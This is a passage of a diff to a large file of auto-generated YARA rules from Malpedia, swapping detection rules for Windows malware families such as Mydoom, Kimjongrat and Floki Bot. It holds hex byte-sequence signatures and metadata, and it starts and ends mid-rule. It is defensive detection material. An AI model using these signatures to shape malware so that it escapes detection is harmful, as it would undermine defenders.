"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.longwatch_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.7ev3n_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "f16a1609422dbff4c114599f67e44a3d80148789c090def0703b76643a40482b" + logic_hash = "3d3793244c4ff8a9f87ce7ce50051977c17fdc03ef0f8a315973a688f14f4ceb" score = 75 quality = 75 tags = "FILE" @@ -130495,33 +133176,33 @@ rule MALPEDIA_Win_Longwatch_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? e8???????? 83c404 833d????????ff 7546 6a00 } - $sequence_1 = { 8bec 53 8b5d08 33c9 57 33c0 8d3c9d2c074300 } - $sequence_2 = { 0f8cf8030000 68a1000000 ff15???????? 6683f888 0f8ce3030000 8d46fe } - $sequence_3 = { eb29 8b55d4 8a07 8b0c95a00b4300 } - $sequence_4 = { 53 8b5d08 33c9 57 33c0 8d3c9d2c074300 f00fb10f } - $sequence_5 = { 6bc618 57 8db874074300 57 } - $sequence_6 = { 8ad3 b9???????? e8???????? 837d9400 8db548ffffff } - $sequence_7 = { e8???????? ff7364 33c9 8d7b18 84c0 0f44f9 } - $sequence_8 = { 56 68a0000000 8bf1 ff15???????? } - $sequence_9 = { c74634d46e4200 6a00 57 8bce e8???????? } + $sequence_0 = { 8d8dd0cdffff e8???????? 8bce 2bcf 3bc1 0f8402b10000 } + $sequence_1 = { 8bd4 89a50cf9ffff c7421407000000 c7421000000000 668902 66398560ffffff 7504 } + $sequence_2 = { 894104 a0???????? 884108 6a00 8d8504ffffff 50 } + $sequence_3 = { c785e4fdffff00000000 6a00 c785e0fdffffd0a54500 ff15???????? 33c0 c705????????07000000 } + $sequence_4 = { 8d85acefffff 50 8d8dd0cdffff e8???????? 8bce 2bcf } + $sequence_5 = { 6a00 8d85fcfeffff 50 8d8dd0cdffff e8???????? 8bce 2bcb } + $sequence_6 = { 8dbd38f1ffff 8d4f02 0f1f840000000000 668b07 83c702 6685c0 75f5 } + $sequence_7 = { 8b0c8d20934500 80643128fd 5f 5e 8be5 5d c3 } + $sequence_8 = { f30f7e05???????? 660fd68564e6ffff 0fb705???????? 6689856ce6ffff f30f7e05???????? 660fd68558e6ffff 0fb705???????? } + $sequence_9 = { 0f84724c0000 8dbda0ddffff 8d4f02 0f1f840000000000 668b07 83c702 6685c0 } condition: - 7 of them and filesize <647168 + 7 of them and filesize <803840 } -rule MALPEDIA_Win_Unidentified_001_Auto : FILE +rule MALPEDIA_Win_Wndtest_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7c85316d-7785-5af3-87a9-b2590753f62d" + id = "a60fab9e-f350-5d99-8e55-84b700dcda0e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_001_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wndtest_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "4757a1bf889ab5e180c54dba6f09c40c0355df630267d0efd95e630d6757bdc3" - score = 75 + logic_hash = "c7d0b1dfe74b472c5174a4761a9428ccee3d781f889972cf04ca5a6d741a211f" + score = 50 quality = 75 tags = "FILE" version = "1" @@ -130534,32 +133215,32 @@ rule MALPEDIA_Win_Unidentified_001_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6830750000 ffd6 8b4df8 85c9 7483 8d45fc } - $sequence_1 = { fec1 88143e 3a4801 72e6 5f 5e 5d } - $sequence_2 = { 2bc6 0f8421fdffff 2df2020000 0f8478fbffff 2d13030000 } - $sequence_3 = { b952555300 3bc1 7767 74d3 } - $sequence_4 = { 8bf1 8b06 57 56 ff5048 8bf8 85ff } - $sequence_5 = { ff15???????? 50 ff15???????? 8bf0 8975f8 3bf3 } - $sequence_6 = { 893d???????? e9???????? c705????????10000000 e9???????? 2d46494e00 7461 48 } - $sequence_7 = { 6a04 68???????? 6a07 6800080000 } - $sequence_8 = { 8935???????? 8d45cc 50 57 } - $sequence_9 = { 50 ff5108 8b45e4 3bc3 5b 7406 } + $sequence_0 = { 8d1439 8a0410 320419 41 } + $sequence_1 = { 56 ffd7 8b0d???????? a3???????? a1???????? } + $sequence_2 = { 56 0fbe7001 83f60d 57 } + $sequence_3 = { 880c3e 5f 5e 8be5 } + $sequence_4 = { 75ea 8bcb 0fb6d2 c1e918 33ca c1e308 } + $sequence_5 = { a3???????? a1???????? 50 51 e8???????? 83c408 50 } + $sequence_6 = { 2bc2 40 50 e8???????? 8bd0 } + $sequence_7 = { ffd7 8b15???????? a3???????? a1???????? 52 50 e8???????? } + $sequence_8 = { 83c404 33c9 8d460a ba02000000 f7e2 } + $sequence_9 = { 8b0d???????? 894808 e9???????? 8d46fe 8bff 668b4802 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <901120 } -rule MALPEDIA_Win_Auriga_Auto : FILE +rule MALPEDIA_Win_Nagini_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3e414b5e-c2de-5c81-b4bc-c099cfe4cd7e" + id = "140c68e0-b1a0-5de4-9ceb-f9c4372ec960" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.auriga_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nagini_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "cddd7158b581ccab9be1a01dbee785ac04d84e6e50041126742a64808d1b3062" + logic_hash = "3751db8355d7cf68abbb539627fa735abe39bfd76ce94371ffdf9eba2b1cc16c" score = 75 quality = 75 tags = "FILE" @@ -130573,32 +133254,32 @@ rule MALPEDIA_Win_Auriga_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 90 5f bb???????? 81eb???????? 2bfb 8bf7 e8???????? } - $sequence_1 = { 755b 817e0c03001200 7552 57 } - $sequence_2 = { e8???????? c9 c20c00 ffb508fcffff 8b8504fcffff 8d8405fcfbffff } - $sequence_3 = { 4a 3bda 745e 7345 2bd3 } - $sequence_4 = { 7408 8b0d???????? 8908 56 8b7508 837e0400 7422 } - $sequence_5 = { 53 53 6a01 6a01 56 ff15???????? 8945dc } - $sequence_6 = { 84c0 7511 ff7510 ff15???????? } - $sequence_7 = { ff45fc 8b4dec ff4df8 2bcb 295df4 ff45f8 } - $sequence_8 = { ffd3 8b45fc 85c0 7539 ff750c 8d45f4 } - $sequence_9 = { 8b85e8fbffff 85c0 7566 ffb5ecfbffff 8d85f0fbffff } + $sequence_0 = { 0131 1f 0031 1f 003422 0337 } + $sequence_1 = { a3???????? eb18 6a00 6a00 6a00 6a00 } + $sequence_2 = { 83c408 85c0 0f8510010000 837c242808 8d442414 68???????? } + $sequence_3 = { 3422 0536240538 27 06 37 260537260535 230434 } + $sequence_4 = { 0a06 1408 0412 06 } + $sequence_5 = { 720e 4e 42 0fb606 80b87081420000 74e9 8b5ddc } + $sequence_6 = { 668944246c a0???????? 8844246e 8a4701 8d7f01 } + $sequence_7 = { 6689442444 0f8238020000 ff74242c e8???????? 83c404 e9???????? } + $sequence_8 = { 0f835ffbffff 03f3 03d3 83fb1f 0f8715040000 ff249da0c64000 } + $sequence_9 = { b3ac 98 b7b0 9c } condition: - 7 of them and filesize <75776 + 7 of them and filesize <12820480 } -rule MALPEDIA_Win_Mydoom_Auto : FILE +rule MALPEDIA_Win_Kimjongrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fbb873d9-471c-5df6-b7cb-17b11908448b" + id = "db4baf64-c410-5dd4-86f2-fb3657762c91" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mydoom_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kimjongrat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "29814c8a4a60df1d6a473af327bca4071707640dfe79f325f53607e3865352f9" + logic_hash = "515b099b5f4271a4a56e7e428e24670deb74340ff8bb9a2bab6a20ed3f485ca9" score = 75 quality = 75 tags = "FILE" @@ -130612,32 +133293,32 @@ rule MALPEDIA_Win_Mydoom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f94c2 83f842 0f94c0 09d0 ba00000000 a801 0f8531010000 } - $sequence_1 = { 49 c744241000000000 8d85c4fdffff 8944240c 894c2408 } - $sequence_2 = { 891c24 e8???????? 85c0 743c 8b85d8feffff 89442404 891c24 } - $sequence_3 = { 891c24 e8???????? 83ec04 c744240402000000 } - $sequence_4 = { 85c0 89c3 7413 89f6 8dbc2700000000 ff149df8354200 } - $sequence_5 = { 8d9dc8f9ffff 891c24 e8???????? 8d8568f9ffff 89442424 89742420 } - $sequence_6 = { 83ec58 895df4 8975f8 897dfc 8b7510 0fb74514 668945e6 } - $sequence_7 = { 89e5 56 53 83ec10 8b750c 83fe01 } - $sequence_8 = { 890424 e8???????? e8???????? 8db406fc2f0000 0fb745e6 } - $sequence_9 = { 85d0 7547 85f6 750c 8b0d???????? 85c9 7546 } + $sequence_0 = { e9???????? c6840db4edffff2a e9???????? c6840db4edffff26 e9???????? c6840db4edffff5b eb6c } + $sequence_1 = { e8???????? 8bd8 83c414 85db 0f8508010000 33c9 894de4 } + $sequence_2 = { ff7004 8d4108 50 e8???????? 8b5508 8b4840 894a20 } + $sequence_3 = { ff7508 e8???????? 6a01 57 6a4c 56 e8???????? } + $sequence_4 = { e9???????? 8b4c8f58 894dd0 898d60ffffff 8b55a4 b860240000 66854208 } + $sequence_5 = { c68540d0ffff00 e8???????? 83c40c ba???????? 33c9 8a02 42 } + $sequence_6 = { e9???????? c6840da0e8ffff77 e9???????? c6840da0e8ffff76 e9???????? c6840da0e8ffff65 e9???????? } + $sequence_7 = { ff30 e8???????? 8b450c 83c404 c70000000000 8b55f8 c645f000 } + $sequence_8 = { e9???????? c6840dccf3ffff2d e9???????? c6840dccf3ffff7d e9???????? c6840dccf3ffff29 e9???????? } + $sequence_9 = { 8bf8 83c404 897dac 85ff 0f8418f3ffff b800400000 66854608 } condition: - 7 of them and filesize <114688 + 7 of them and filesize <1572864 } -rule MALPEDIA_Win_Graftor_Auto : FILE +rule MALPEDIA_Win_Zerot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7d45e232-2e70-5f76-b127-1013459f5457" + id = "8ef83190-c437-5c69-9e28-6f4ff8bb0d5f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graftor_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zerot_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "2d0bf0ad42127878b7c1f7be3bcb33cc3ba27a99993b023e29cc91abed5bec59" + logic_hash = "0536a182186ebeb3c971f24e54b07f0b9a695f53e7e594ac1e15149db29c5630" score = 75 quality = 75 tags = "FILE" @@ -130651,32 +133332,32 @@ rule MALPEDIA_Win_Graftor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d742434 c684245803000069 e8???????? 8b54241c 53 e8???????? 59 } - $sequence_1 = { 55 8bec 51 8365fc00 56 0528010000 } - $sequence_2 = { ff750c 8d7de0 ff7508 e8???????? 8b45e8 8945f0 8b45ec } - $sequence_3 = { 8d44247c 50 c684245c03000070 e8???????? 83c40c c684245003000071 8b4c241c } - $sequence_4 = { 6a00 eb8b 8b7d0c 8b0f 8b4514 394810 7641 } - $sequence_5 = { 55 8bec 83e4f8 6aff 687e634c00 64a100000000 } - $sequence_6 = { 8901 33c0 40 e9???????? 8365d800 c745dc34ad4800 a1???????? } - $sequence_7 = { ff75ec 8d45e0 53 50 8bc6 e8???????? 8b18 } - $sequence_8 = { eb05 a1???????? 8b4dfc 33cd e8???????? c9 c3 } - $sequence_9 = { 3bc3 0f8686010000 8b87d0000000 6a64 99 5e f7fe } + $sequence_0 = { ff15???????? 46 81e6ff000080 7908 } + $sequence_1 = { 50 68???????? ff15???????? 8b3d???????? 8d85bcfbffff 50 } + $sequence_2 = { 6a00 ff760c ff15???????? 85c0 7430 6a00 8d85ccf9ffff } + $sequence_3 = { 8bf8 6a59 ff15???????? 85c0 b9???????? 0f45cf } + $sequence_4 = { 8b8ef2050000 8d96fa050000 e8???????? 8d8534cdffff 50 6802020000 ff15???????? } + $sequence_5 = { 85c0 740c 81bd34fcffffc8000000 7421 8b8530fcffff 40 898530fcffff } + $sequence_6 = { 8d7001 75da 8b35???????? 8d857cffffff 50 ffd6 83c002 } + $sequence_7 = { 6800020000 8d85bcfdffff 6a00 50 e8???????? 68???????? } + $sequence_8 = { 880c32 8a47f8 c0e005 02c1 880432 } + $sequence_9 = { 0f84b6000000 80bd53fcffff00 0f84a9000000 0fb74214 } condition: - 7 of them and filesize <294912 + 7 of them and filesize <303104 } -rule MALPEDIA_Win_Disk_Knight_Auto : FILE +rule MALPEDIA_Win_Colibri_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9beebfb6-ef57-52bd-934c-31d9b91ab2bc" + id = "92334149-98b7-5fb0-8e08-056f3f401efb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.disk_knight_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.colibri_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "e89ae24c28bc10924a7fb7bbea0ccafb184ecff432361cc9f981384efa6a4077" + logic_hash = "70a6e8c65b49a36e967be3c5e646c3791445447505e2691dc2dc449a828d2e49" score = 75 quality = 75 tags = "FILE" @@ -130690,32 +133371,32 @@ rule MALPEDIA_Win_Disk_Knight_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 897d8c 897d88 ff15???????? 8b1d???????? 8d4dc4 51 } - $sequence_1 = { c745f0e01b4000 33c0 8945f4 8945f8 8845e0 6a01 ff15???????? } - $sequence_2 = { ff15???????? f7d8 1bc0 23f0 8d45b0 50 8d4dc0 } - $sequence_3 = { 8d8d7cffffff 51 56 ff5220 dbe2 85c0 7d0f } - $sequence_4 = { 8b4710 8d5594 52 50 8b08 ff9138010000 85c0 } - $sequence_5 = { 895004 8b8d48ffffff 894808 8b954cffffff 89500c 8b85e0feffff 8b08 } - $sequence_6 = { 3bc8 7d7d 8d9574ffffff 52 6a01 56 e8???????? } - $sequence_7 = { ff15???????? 8b3d???????? 83c40c 85f6 0f84d1010000 a1???????? 85c0 } - $sequence_8 = { e8???????? 8bf0 ff15???????? 8d54240c 8d8424a0000000 52 50 } - $sequence_9 = { 8b45d0 0f80ea060000 69db00010000 99 0f80dd060000 2bc2 899d10ffffff } + $sequence_0 = { 8b4dfc 8d4901 e8???????? 56 56 8bd8 } + $sequence_1 = { 0f4575f4 59 e8???????? ba1f90113c 8bc8 e8???????? ffd0 } + $sequence_2 = { 83c602 0fb706 8bd0 6685c0 75e2 8933 33c0 } + $sequence_3 = { 8bf1 8bfa 897df8 85f6 7502 } + $sequence_4 = { 897c2440 57 eba2 8364243c00 eb1b } + $sequence_5 = { 8d8578f9ffff 33ff 6804010000 50 57 6a02 59 } + $sequence_6 = { 8365f800 50 e8???????? 59 85c0 7413 8b4dfc } + $sequence_7 = { 668945a4 6689855effffff 66894d96 59 6a76 58 6a69 } + $sequence_8 = { 7445 8b4878 85c9 743e 33ff 39787c 7437 } + $sequence_9 = { c1e81f 8d0448 8b0c85c0124000 8d45d4 } condition: - 7 of them and filesize <868352 + 7 of them and filesize <51200 } -rule MALPEDIA_Win_Zenar_Auto : FILE +rule MALPEDIA_Win_Murofet_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4a5b8e75-0846-5f97-8625-2c49ccc878e4" + id = "7aa9a2c5-7064-5442-8638-24194df65bf5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zenar_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.murofet_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "aaf8e2aaae847a92d9529fc5af1d76e9bd4aae4fdb4d807ed83b4a0145bc159f" + logic_hash = "f1786a85d9dda8157fc7a7bca5587363f921b04e9ce6db23c0c6a6b000291064" score = 75 quality = 75 tags = "FILE" @@ -130729,32 +133410,32 @@ rule MALPEDIA_Win_Zenar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7409 83c024 50 8b08 ff5108 8b4df4 } - $sequence_1 = { 8bf1 8d8e80020000 e8???????? 8d8e68020000 e8???????? 8bce 5e } - $sequence_2 = { 8bc7 8bcf 83e03f c1f906 6bf038 03348d98ae4300 } - $sequence_3 = { 8d8d70ffffff c645fc03 e8???????? 84c0 7406 8ac3 } - $sequence_4 = { 8bfe 83e03f c1ff06 6bd838 8b04bd98ae4300 f644032801 7444 } - $sequence_5 = { 55 8bec 0fb701 83ec10 83e811 741a 83e801 } - $sequence_6 = { 8d4d0c ff7514 8b7d08 8945f8 897314 } - $sequence_7 = { 8b4dfc 0f95c0 890a c9 c20c00 55 8bec } - $sequence_8 = { 837d0c04 0f85e3000000 8d4634 50 8d4dc8 e8???????? } - $sequence_9 = { eb07 8b4584 8930 33db 8d4dd4 e8???????? } + $sequence_0 = { 3c02 72e5 e8???????? a2???????? 84c0 7510 } + $sequence_1 = { 7504 3c02 72bf b001 } + $sequence_2 = { 3c02 72e5 e8???????? a2???????? } + $sequence_3 = { e8???????? e8???????? 3c02 72e5 e8???????? a2???????? 84c0 } + $sequence_4 = { 6a10 8d4624 55 50 ff15???????? 83c40c } + $sequence_5 = { c3 e8???????? 33c0 c20400 55 8bec 83ec68 } + $sequence_6 = { e8???????? 33c0 c20400 55 8bec 83ec68 53 } + $sequence_7 = { 6a10 8d4624 55 50 } + $sequence_8 = { 72e5 e8???????? a2???????? 84c0 7510 } + $sequence_9 = { ff15???????? c6443eff00 83f8ff 7509 56 } condition: - 7 of them and filesize <519168 + 7 of them and filesize <622592 } -rule MALPEDIA_Win_Acehash_Auto : FILE +rule MALPEDIA_Win_Mail_O_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "14f9c3a4-6e4e-554e-b1b7-7826b028e7e0" + id = "f99f4969-80f4-597a-910e-873dc6aaa6b8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acehash_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mail_o_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "a82974d1f4758bd3335b7cc99825d249f1ec423d226c32410d6047b493cb8d39" + logic_hash = "873a5557134df7611d1b518c4c6caa2026bc1ae07076d192a3e745c13ea47ee0" score = 75 quality = 75 tags = "FILE" @@ -130768,32 +133449,32 @@ rule MALPEDIA_Win_Acehash_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4885c0 7420 488d1599dc0200 488bcb ff15???????? 488bc8 } - $sequence_1 = { 85c0 0f85e6000000 4c8b470c 488b55d0 488b4f04 ff15???????? 8bd8 } - $sequence_2 = { 488b7d98 8b742440 8b542458 41bb00020000 4c8d0d4e23feff 448a3f 4584ff } - $sequence_3 = { 7510 b810000000 488b5c2430 4883c420 5f c3 4885db } - $sequence_4 = { 85ff 0f8513ffffff 33c0 4c8b642450 4c8b6c2458 488b5c2460 4883c430 } - $sequence_5 = { 442b8486a0e10300 4533d8 83bf800000000a 0f863c010000 8b4730 8b4f70 458d0c03 } - $sequence_6 = { 8bc3 483bd0 0f871a050000 4c8d151995fdff 4403f2 4b8b8ceaa0511100 8a443108 } - $sequence_7 = { 8bfd 66895802 410fb78704100000 0fbfcb } - $sequence_8 = { 7cda 440fbf4302 418bd4 488bce 468d048508000000 e8???????? 488d0d33240300 } - $sequence_9 = { 48833d????????00 488d0581900300 740f 3908 740e 4883c010 4883780800 } + $sequence_0 = { 7707 33c0 e9???????? f683a414000020 7417 8b83700e0000 2500000100 } + $sequence_1 = { f20f104c2450 f20f114930 83cbff 8b0f e8???????? 8bc3 488b5c2470 } + $sequence_2 = { eb0c 488d15b7940d00 e8???????? 488b4708 488d542440 448b4710 33c9 } + $sequence_3 = { b920000000 ffcb ff542428 83f8ff 0f84b2010000 ffc7 85db } + $sequence_4 = { 8b5c2438 418d7f10 4533c0 498bce 3bfb 7e23 488d542440 } + $sequence_5 = { e8???????? eb17 498b4d10 4d8bf4 418bdc e8???????? eb06 } + $sequence_6 = { c744242071000000 448d4041 eb1f 488918 488bd0 488b4d08 e8???????? } + $sequence_7 = { 85c0 743c 48ffc3 483b5c2430 72c3 488bcf e8???????? } + $sequence_8 = { 84c0 7465 48ffc1 498d0408 483bc2 72df ba00800000 } + $sequence_9 = { e8???????? 8bf8 85c0 7556 48837c245000 7505 8d7809 } condition: - 7 of them and filesize <2318336 + 7 of them and filesize <5985280 } -rule MALPEDIA_Win_Bolek_Auto : FILE +rule MALPEDIA_Win_Floki_Bot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "21f1a0ba-06a1-5668-aea4-333af031f0f6" + id = "1cde0271-e319-5f49-b7d9-6126f8e6a662" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bolek_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.floki_bot_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "28c372302adc63618e82259e643572bec2793a354bb442ed761054ecd6bf8112" + logic_hash = "de31350a6a6eca83bc8efd1fc6e07ad972095e30f5b6c290e1bfd7b68f7ea01f" score = 75 quality = 75 tags = "FILE" @@ -130807,32 +133488,32 @@ rule MALPEDIA_Win_Bolek_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894c2454 8bc7 8b8c24ac000000 8bdf 0facc808 33ed c1e318 } - $sequence_1 = { 3b31 72e1 51 e8???????? 59 8bc7 5f } - $sequence_2 = { 8bcd 0fa4c117 0bf9 c1e017 0bd8 8bcd 8b442460 } - $sequence_3 = { 8d86f4000000 50 e8???????? 83c418 56 6880000000 ff750c } - $sequence_4 = { dd442418 dc0d???????? dd1c24 68???????? 8b1d???????? 8d44242c 6a40 } - $sequence_5 = { eb7a 3c03 0f85bf000000 53 6a01 8d442428 50 } - $sequence_6 = { 85c9 746f 803900 746a 6a2c 51 890f } - $sequence_7 = { e8???????? eb07 814f7c00040000 5f 5e 5d 5b } - $sequence_8 = { 89448c20 41 83c304 ebd0 8bac2434030000 8b9c2430030000 85db } - $sequence_9 = { 83e4f8 83ec68 8364242000 8364242400 8b450c c744241001234567 c744241489abcdef } + $sequence_0 = { ff7508 e8???????? 83f8ff 7511 ff7518 ff7514 53 } + $sequence_1 = { 68???????? 53 89460c e8???????? 85c0 } + $sequence_2 = { c3 e8???????? 84c0 742c 56 ff15???????? 8bf0 } + $sequence_3 = { 53 e8???????? eb5e 8d45f4 99 8945b4 8b4508 } + $sequence_4 = { 83f840 7205 83c8ff eb63 56 6a04 8985fcfeffff } + $sequence_5 = { 3bd1 72f3 eb05 83faff 7527 8d7101 } + $sequence_6 = { e8???????? 83ffff 0f8472ffffff 3bfb 7404 c645fb00 8a45fb } + $sequence_7 = { 3b4e48 7612 ff7004 6a03 ff7644 51 ff10 } + $sequence_8 = { 56 6800040000 ff15???????? 8bf8 3bfe 0f8483000000 8d45e8 } + $sequence_9 = { 8bf7 e8???????? 8b7d0c 8b5d14 837d1000 742e 33c0 } condition: - 7 of them and filesize <892928 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Bangat_Auto : FILE +rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a2d4fb7c-d848-52ac-b553-710b64461faf" + id = "7272c171-5952-5404-84f8-64d1272487e9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bangat_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.locky_decryptor_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "795b6baa10d3ea1f31877796bf7d8c3236899cd7fc3cddcf5f5e7734a685bf62" + logic_hash = "608b3ec7b9a67c8bdfea65d7f94d3ac9056bb8fb93478235380693008ad0bb57" score = 75 quality = 75 tags = "FILE" @@ -130846,32 +133527,32 @@ rule MALPEDIA_Win_Bangat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a01 6800000040 50 e8???????? 83c43c 8bf0 83feff } - $sequence_1 = { 13f9 03f0 13fd 8b6c2434 89742418 03de 8b74245c } - $sequence_2 = { 8b442424 99 f7fe 83c408 85d2 7425 6815050000 } - $sequence_3 = { ff750c 50 ff15???????? 8bf0 ff15???????? 83f850 } - $sequence_4 = { 8b4c2474 0bc8 8b442464 0bc2 8b54244c 33f1 33f8 } - $sequence_5 = { 83cbff eb11 83fb01 750c 8b5004 85d2 7505 } - $sequence_6 = { 8b5704 8b0e 8b3a 8bc1 2bc7 7511 8b7a08 } - $sequence_7 = { 8b35???????? 8d45e8 68???????? 50 ffd6 8bf8 59 } - $sequence_8 = { 8b4b58 898184030000 8b03 3d00030000 0f8ebf000000 8b442418 8b4c2414 } - $sequence_9 = { 75f3 5f 5e 5d b830000000 } + $sequence_0 = { 8d7c2420 c684249000000001 e8???????? 6a01 33ff } + $sequence_1 = { 56 6a5c 8bf0 e8???????? } + $sequence_2 = { 58 33db 33c9 8945e0 } + $sequence_3 = { 8d45e0 50 33ff 6880000000 897dc0 ff15???????? 50 } + $sequence_4 = { 66890e 56 8d8ddcfbffff e8???????? 8bc6 } + $sequence_5 = { 50 e8???????? 8364247800 56 50 8d442420 } + $sequence_6 = { 68???????? 8d8504ffffff e9???????? 015ddc 6a00 5b } + $sequence_7 = { 56 e8???????? 8b4df4 83c40c 5f 5e 8bc3 } + $sequence_8 = { 894c2410 3bda 7e6c 33d2 c7442418f0ffffff } + $sequence_9 = { ff15???????? c745fc0a000000 395de4 740f } condition: - 7 of them and filesize <1228800 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Pngdowner_Auto : FILE +rule MALPEDIA_Win_Headertip_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "31e7b95d-0a01-5118-aefe-72f10c1de52f" + id = "85fa344d-9a7e-5c14-be69-b6cdc5f3bcac" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pngdowner_auto.yar#L1-L125" 